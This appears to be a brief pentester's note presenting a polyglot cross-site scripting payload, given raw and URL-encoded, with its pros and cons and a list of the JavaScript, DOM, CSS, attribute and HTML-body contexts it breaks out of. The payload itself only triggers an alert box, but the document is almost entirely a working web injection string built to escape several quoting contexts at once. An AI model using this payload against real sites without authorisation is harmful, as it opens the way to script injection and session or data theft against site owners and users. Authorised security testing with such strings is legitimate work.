toString()+alert(/xss/)+function(){/*'+alert(/xss/)+'"+alert(/xss/)+"--></style><img src=x onerror=alert(/xss/)>*/}
URL Encoded:
toString()%2Balert(%2Fxss%2F)%2Bfunction()%7B%2F*%27%2Balert(%2Fxss%2F)%2B%27%22%2Balert(%2Fxss%2F)%2B%22--%3E%3C%2Fstyle%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%2Fxss%2F)%3E*%2F%7D
Pros
- Able to exploit most places (the list is below)
- Trying not to break JavaScript syntax
- Easy to identify the vulnerable field (e.g. alert(/userMiddleName/))
Cons - too long for values which have length limit
List of exploitable places:
- JavaScript/DOM XSS
- var x="asdf<%= xssLocator %>xxx";
- var y='asdf<%= xssLocator %>xxx';
- opener.<%= xssLocator %>(some, arguments);
- element.html(xssLocatorInput.value);
- CSS XSS:
- <style>a:after { content: '<%= xssLocator %>';}</style>
- HTML Attribute XSS:
- <a href="#" alt="<%= xssLocator %>">test</a>
- <a href='#' alt='<%= xssLocator %>'>test</a>
- HTML Body and Comments XSS
- <%= xssLocator %>
- <!-- <%= xssLocator %> -->
